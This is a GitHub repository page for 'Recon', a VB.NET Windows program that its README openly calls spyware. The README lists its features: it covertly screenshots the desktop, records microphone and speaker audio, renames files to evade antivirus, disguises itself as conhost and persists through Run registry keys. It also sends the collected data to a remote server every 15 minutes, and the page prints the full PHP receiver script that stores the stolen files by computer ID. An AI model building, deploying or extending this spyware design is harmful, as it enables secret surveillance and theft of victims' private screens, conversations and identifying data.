Skip to content
/ Recon Public

Basic spyware that can secretly take screenshots and record the audio input and output of the target computer.

License

Apache-2.0 license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ahmedosama007/Recon

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
Recon
Recon
 
 
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
Recon.sln
Recon.sln
 
 
icon.ico
icon.ico
 
 

Repository files navigation

Recon

Basic spyware that can secretly take screenshots and record the audio input and output of the target computer.

Reconnaissance

  • Recon is a Windows Form app written in VB.NET targeting the .NET Framework 4.7.2
  • Recon takes a screenshot of the target computer desktop every 5 seconds, it saves screenshots in PNG format. The app uses nQuant.Core.NETStandard and custom PNG encoder parameters to reduce the size of the generated PNG files thus optimizing the data upload speed.
  • Recon uses NAudio to capture the audio input and output into WAV streams.
  • Recon uses NAudio.Lame to convert WAV streams to MP3 in order to produce smaller audio files suitable for data exfiltration.
  • The app uses custom file extensions so that it won't trigger AVs(rpng for PNG image files, rmp3 for MP3 files, and rzip for ZIP archive files).
  • After generating the data, the app uses DotNetZip to create a password-protected ZIP file to contain the exfiltrated data. The ZIP files will be uploaded to the remote server every 15 minutes using the WebClient class.
  • The app uploads the generated screenshots and audio files to the remote server running the following PHP script:
<?php

header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

if (!isset($_POST)) exit(-1); // No POST data

if (isset($_GET['computer_id']) && !empty($_GET['computer_id'])) {
  $computerId = htmlspecialchars(trim($_GET['computer_id']), ENT_QUOTES); //Get target computer ID
} else {
  echo "No computer ID";
  exit(-1);
}

$data_dir = './data/';

$target_dir = $data_dir . $computerId;
if (!file_exists($target_dir))  mkdir(($target_dir));

$target_file = $target_dir . '/' . basename($_FILES["file"]["name"]);
$target_fileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

$uploadOk = 1;

// Check if file already exists
if (file_exists($target_file)) {
  echo "File already exists";
  $uploadOk = 0;
}

// Check file size
if ($_FILES["file"]["size"] > 250000000) { //250 MB limit
  echo "File exceeds the maximum size";
  $uploadOk = 0;
}

// Check file type
if ($target_fileType != "zip" && $target_fileType != "rzip") {
  echo "Only ZIP and RZIP files are allowed";
  $uploadOk = 0;
}

if ($uploadOk == 1) {

  $tmp_name = $_FILES["file"]["tmp_name"];

  if (move_uploaded_file($tmp_name, $target_file)) {
    echo "File uploaded successfully";
  } else {
    echo "Error uploading the file";
  }
}
  • The app generates an ID for the target computer and sends it to the remote server; the ID consists of the machine name, user name, and OS version. The computer ID helps organize the uploaded data on the server.
  • The app disguises itself as conhost process, it uses a similar icon and file properties.
  • Recon acheives persistence by adding itself in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

About

Basic spyware that can secretly take screenshots and record the audio input and output of the target computer.

Topics

data audio-recorder spyware vbnet hacker exfiltration microphone-capture

Resources

Readme

License

Apache-2.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages